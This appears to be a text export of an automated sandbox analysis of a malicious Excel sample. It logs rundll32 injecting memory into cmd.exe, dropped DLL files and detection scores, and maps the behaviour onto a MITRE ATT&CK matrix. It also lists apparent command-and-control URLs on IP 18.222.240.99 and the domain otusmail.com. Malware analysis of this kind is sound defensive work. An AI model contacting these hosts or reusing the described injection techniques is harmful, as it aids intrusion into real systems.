Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D6BF5
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D6C02
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D6C09
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D6C1B
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D6C4E
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D6CAF
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D6CBD
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D6CDF
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D6CEE
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D6D07
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D6D77
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D6D87
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D6D8E
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D6D9F
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D6DB8
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D6DD7
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D6DDE
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D6EAB
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D6EB2
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D6ED8
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D6EFD
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D6F04
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D6FAC
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D6FB9
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D6FC0
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D6FD2
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D70A9
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D70B9
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D70DC
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D70E8
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D711A
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D71D8
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D71E8
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D71EF
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D7200
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D7219
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D7238
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D723F
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D730B
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D7312
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D7338
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D735D
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D7364
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D748E
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D749B
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D74A2
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D74B7
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D759F
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D75AF
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D75D2
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D75DE
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D7606
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D760B
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D761A
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D76BA
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D76C0
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D7771
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D7777
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D7807
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D7816
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D7873
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D78D0
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D78DF
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D78F1
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D7905
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D79B7
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D79C6
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D79E1
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D79E8
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D7A07
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D7A85
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D7AA3
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D7AB1
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D7AB8
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D7C5A
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 11D7C68
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe
Source: cmd.exe, 00000007.00000002.976381117.00000000051E0000.00000002.00000001.sdmp | Binary or memory string: ShellFileViewFolderExploreFolderConfirmCabinetIDDeleteGroupDeleteItemReplaceItemReloadFindFolderOpenFindFileCreateGroupShowGroupAddItemExitProgman[RN
Source: cmd.exe, 00000007.00000002.976381117.00000000051E0000.00000002.00000001.sdmp | Binary or memory string: %c:\%sExplorerDMGFrameGroupssetupPmFrameGetIconGetDescriptionGetWorkingDirSoftware\Microsoft\Windows\CurrentVersion\Explorer\MapGroupsSenderCA_DDECLASSInstallMake Program Manager GroupStartUpccInsDDEBWWFrameDDEClientWndClassBACKSCAPEMediaRecorderMedia Recorder#32770DDEClientddeClassgroups
Source: rundll32.exe, 00000001.00000003.711977375.0000000003036000.00000004.00000001.sdmp, cmd.exe, 00000007.00000002.972852929.00000000033C0000.00000002.00000001.sdmp | Binary or memory string: Program Manager
Source: cmd.exe, 00000007.00000002.972852929.00000000033C0000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
Source: cmd.exe, 00000007.00000002.972852929.00000000033C0000.00000002.00000001.sdmp | Binary or memory string: Progman
Source: cmd.exe, 00000007.00000002.976381117.00000000051E0000.00000002.00000001.sdmp | Binary or memory string: PreviewMetadataLabelPreviewMetadataSpacerPreviewEditMetadataPreviewMetadataControlIconLayoutsWorkAreaChangeActivityPreviewMetadataRowAddRemoveAppBarShell_TrayWndhomepagetasklinktasklinkTaskSearchTexttasks%s
Source: rundll32.exe, 00000001.00000003.711977375.0000000003036000.00000004.00000001.sdmp | Binary or memory string: *Program ManagerpszDesktopTitleWSoftware\Classes\
Source: cmd.exe, 00000007.00000002.976381117.00000000051E0000.00000002.00000001.sdmp | Binary or memory string: animationTileContentsSrcVerticalScrollBaranimationProgressSrcanimationTileContentsDstInneranimationTileContentsSrcInneranimationTileContentsDstanimationProgressDstInneranimationProgressDstanimationProgressSrcInnereltRegularTileHeadereltSummaryeltInterruptPaneeltProgressBaridOperationTileeltInterruptDoForAlleltItemIconeltInterruptDescriptioneltInterruptButtonsContainereltInterruptDeleteBtneltInterruptElevateBtneltItemPropseltItemNameeltInterruptYesBtneltInterruptRetryBtneltInterruptCancelBtneltInterruptSkipBtnConfirmationCheckBoxDoForAlleltInterruptNoBtneltInterruptOKBtnshell\shell32\operationstatusmgr.cppidTileSubTextidOperationInterrupteltInterruptDoForAllLabelidTileActionIdTileKeepSourceidItemTileIdTileDecideForEachIdTileIgnoreIdTileKeepAsPersonalIdTileKeepAsWorkIdTileKeepDestCustomCommandIconDecideForEachTileIconSkipTileIconKeepSourceTileIconeltItemTileContainereltConflictInterruptDescriptionidTileIconidCustomConflictInterrupteltInterruptTileHeaderidConflictInterrupteltRateChartCHARTVIEW%0.2fIdTileDefaulteltPauseButtoneltTileContentseltTile%ueltTimeRemainingeltConflictInterrupteltConfirmationInterrupteltLocationseltItemsRemainingeltDetailseltScrolleltRegularTileeltCancelButtonidTileHosteltScrollBarFillereltDividereltProgressBarContainereltDisplayModeBtnFocusHoldereltDisplayModeBtnWindows.SystemToast.ExplorerEnthusiastModeprogmaneltFooterArealfEscapementSoftware\Microsoft\NotepadRICHEDIT50WlfUnderlinelfItaliclfWeightlfOrientationlfClipPrecisionlfOutPrecisionlfCharSetlfStrikeOutLucida ConsoleiPointSizelfPitchAndFamilylfQualitylfFaceName
Source: cmd.exe, 00000007.00000002.976381117.00000000051E0000.00000002.00000001.sdmp | Binary or memory string: ImageList_CoCreateInstanceProgmanProgram Managercomctl32.dllImageList_ReplaceIconImageList_CreateImageList_Destroy
Source: cmd.exe, 00000007.00000002.976381117.00000000051E0000.00000002.00000001.sdmp | Binary or memory string: |}TFoldersAppPropertiesShell*ProgmanProgmanPROGMANSoftware\Microsoft\Windows\CurrentVersion\PoliciesPolicyAutoColorizationHandleAssociationChange
Source: cmd.exe, 00000007.00000002.972852929.00000000033C0000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
Source: rundll32.exe, 00000001.00000003.711977375.0000000003036000.00000004.00000001.sdmp | Binary or memory string: RtlDllShutdownInProgress_p0.*System*.*....../UseSystemForSystemFoldersSoftware\Microsoft\Windows\CurrentVersion\Explorerdesktop.ini%APPDATA%%USERPROFILE%%ALLUSERSPROFILE%%ProgramFiles%%SystemRoot%%SystemDrive%\\%COMPUTERNAME%...\...PATH.exe.lnk.cmd.bat.com.pifCutListSoftware\Microsoft\Windows\CurrentVersion\Explorer\FileAssociation\VarFileInfo\Translation\StringFileInfo\%04X%04X\FileDescription\StringFileInfo\040904E4\FileDescription\StringFileInfo\04090000\FileDescriptionProgram ManagerpszDesktopTitleW%%%s%%%sUSERPROFILEProgramFilesSystemRootSystemDrivewindir"%1"commandshellSoftware\classesDefaultIconshell\%sAssignmentType0Software\Classes\Applications\%sSoftware\Classes\Applications%1.ade.adp.app.asp.cer.chm.cnt.crt.csh.der.fxp.gadget.grp.hlp.hpj.inf.ins.isp.its.js.jse.ksh.mad.maf.mag.mam.maq.mar.mas.mat.mau.mav.maw.mcf.mda.mdb.mde.mdt.mdw.mdz.msc.msh.msh1.msh1xml.msh2.msh2xml.mshxml.msp.mst.msu.ops.pcd.pl.plg.prf.prg.printerexport.ps1.ps1xml.ps2.ps2xml.psc1.psc2.psd1.psm1.pst.scf.sct.shb.shs.theme.tmp.url.vbe.vbp.vbs.vhd.vhdx.vsmacros.vsw.webpnp.ws.wsc.wsf.wsh.xnkHKCU:HKLM:HKCR:%s\shell\%s\commandshell\%s\commandSoftware\Clients\%sSoftware\Clients\%s\%sOpen*.*....../UseSystemForSystemFoldersdesktop.ini%SystemDrive%\\%COMPUTERNAME%...\...%s\%s\StringFileInfo\04090000\FileDescriptionT
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_6732AB0A cpuid
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_6732AD36 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

Mitre Att&ck Matrix

The original 14-column matrix is listed here per tactic. The digits following a technique name are the match-count badges attached to that cell in the original matrix, reproduced as extracted; techniques without digits are grid cells that carried no badge.

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: Scripting 21; Shared Modules 1; Exploitation for Client Execution 43; At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter
Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
Privilege Escalation: Process Injection 512; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
Defense Evasion: Masquerading 121; Disable or Modify Tools 1; Virtualization/Sandbox Evasion 21; Process Injection 512; Deobfuscate/Decode Files or Information 1; Scripting 21; Obfuscated Files or Information 2; Rundll32 1
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: System Time Discovery 1; Query Registry 1; Security Software Discovery 21; Process Discovery 1; Virtualization/Sandbox Evasion 21; Remote System Discovery 1; File and Directory Discovery 2; System Information Discovery 23
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot
Collection: Archive Collected Data 1; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Command and Control: Encrypted Channel 12; Non-Application Layer Protocol 1; Application Layer Protocol 2; Protocol Impersonation; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue

Behavior Graph

(Interactive graph not reproduced in this text version. Its legend distinguished: Process, Signature, Created File, DNS/IP Info, Is Dropped, Is Windows Process, Number of created Registry Values, Number of created Files, the language markers Visual Basic, Delphi, Java, .Net C# or VB.NET, C/C++ or other, plus Is malicious and Internet.)
Screenshots

(Screenshot thumbnails not reproduced in this text version.)

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
Documents_111651917_375818984.xls | 3% | Virustotal |

Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\vegas[1].dll | 4% | ReversingLabs |
C:\Users\user\bsdnbsej.dbw | 4% | ReversingLabs |

Unpacked PE Files

Source | Detection | Scanner | Label
7.2.cmd.exe.10b0000.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen

Domains

No Antivirus matches

URLs

Source | Detection | Scanner | Label
http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0 | 0% | URL Reputation | safe
http://www.certplus.com/CRL/class3.crl0 | 0% | URL Reputation | safe
http://www.e-me.lv/repository0 | 0% | URL Reputation | safe
http://www.acabogacia.org/doc0 | 0% | URL Reputation | safe
http://crl.chambersign.org/chambersroot.crl0 | 0% | URL Reputation | safe
http://ocsp.suscerte.gob.ve0 | 0% | URL Reputation | safe
http://www.postsignum.cz/crl/psrootqca2.crl02 | 0% | URL Reputation | safe
http://crl.dhimyotis.com/certignarootca.crl0 | 0% | URL Reputation | safe
https://18.222.240.99/qOh | 0% | Avira URL Cloud | safe
http://www.chambersign.org1 | 0% | URL Reputation | safe
http://www.pkioverheid.nl/policies/root-policy0 | 0% | URL Reputation | safe
http://www.suscerte.gob.ve/lcr0# | 0% | URL Reputation | safe
http://ca2.mtin.es/mtin/crl/MTINAutoridadRaiz0 | 0% | URL Reputation | safe
http://crl.ssc.lt/root-c/cacrl.crl0 | 0% | URL Reputation | safe
http://postsignum.ttc.cz/crl/psrootqca2.crl0 | 0% | URL Reputation | safe
http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl | 0% | URL Reputation | safe
http://ca.disig.sk/ca/crl/ca_disig.crl0 | 0% | URL Reputation | safe
http://crl1.comsign.co.il/crl/comsignglobalrootca.crl0 | 0% | URL Reputation | safe
http://www.certplus.com/CRL/class3P.crl0 | 0% | URL Reputation | safe
http://www.suscerte.gob.ve/dpc0 | 0% | URL Reputation | safe
http://www.certplus.com/CRL/class2.crl0 | 0% | URL Reputation | safe
http://www.disig.sk/ca/crl/ca_disig.crl0 | 0% | URL Reputation | safe
http://www.defence.gov.au/pki0 | 0% | URL Reputation | safe
http://www.sk.ee/cps/0 | 0% | URL Reputation | safe
http://www.globaltrust.info0= | 0% | Avira URL Cloud | safe
http://policy.camerfirma.com0 | 0% | URL Reputation | safe
http://www.ssc.lt/cps03 | 0% | URL Reputation | safe

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
otusmail.com | 104.21.64.132 | true | false | | unknown

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0 | cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.certplus.com/CRL/class3.crl0 | cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.e-me.lv/repository0 | cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.acabogacia.org/doc0 | cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://crl.chambersign.org/chambersroot.crl0 | cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://ocsp.suscerte.gob.ve0 | cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.postsignum.cz/crl/psrootqca2.crl02 | cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://crl.dhimyotis.com/certignarootca.crl0 | cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://sertifikati.ca.posta.rs/crl/PostaCARoot.crl0 | cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmp | false | | high
https://18.222.240.99/qOh | rundll32.exe, 00000001.00000002.802536154.000000000308A000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://www.chambersign.org1 | cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.pkioverheid.nl/policies/root-policy0 | cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://repository.swisssign.com/0 | cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmp | false | | high
http://www.suscerte.gob.ve/lcr0# | cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://ca2.mtin.es/mtin/crl/MTINAutoridadRaiz0 | cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://crl.ssc.lt/root-c/cacrl.crl0 | cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://postsignum.ttc.cz/crl/psrootqca2.crl0 | cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl | cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://ca.disig.sk/ca/crl/ca_disig.crl0 | cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://crl1.comsign.co.il/crl/comsignglobalrootca.crl0 | cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.certplus.com/CRL/class3P.crl0 | cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.suscerte.gob.ve/dpc0 | cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.certeurope.fr/reference/root2.crl0 | cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmp | false | | high
http://www.certplus.com/CRL/class2.crl0 | cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.disig.sk/ca/crl/ca_disig.crl0 | cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://eca.hinet.net/repository/Certs/IssuedToThisCA.p7b05 | cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmp | false | | high
http://www.defence.gov.au/pki0 | cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.sk.ee/cps/0 | cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.globaltrust.info0= | cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmp | false | Avira URL Cloud: safe | low
http://www.anf.es | cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmp | false | | high
http://www.pki.admin.ch/cps/CPS_2_16_756_1_17_3_1_0.pdf09 | cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmp | false | | high
http://pki.registradores.org/normativa/index.htm0 | cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmp | false | | high
http://policy.camerfirma.com0 | cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.ssc.lt/cps03 | cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://ocsp.pki.gva.es0 | cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.anf.es/es/address-direccion.html | cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmp | false | | high
https://www.anf.es/address/)1(0& | cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmp | false | | high
http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0? | cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
https://18.222.240.99/hOg | rundll32.exe, 00000001.00000002.802536154.000000000308A000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://ca.mtin.es/mtin/ocsp0 | cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://crl.ssc.lt/root-b/cacrl.crl0 | cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://web.ncdc.gov.sa/crl/nrcacomb1.crl0 | cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.certicamara.com/dpc/0Z | cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmp | false | | high
http://www.uce.gub.uy/informacion-tecnica/politicas/cp_acrn.pdf0G | cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://crl.pki.wellsfargo.com/wsprca.crl0 | cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmp | false | | high
https://18.222.240.99/update/infoy | rundll32.exe, 00000001.00000003.801717651.00000000030BE000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://wwww.certigna.fr/autorites/0m | cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.dnie.es/dpc0 | cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
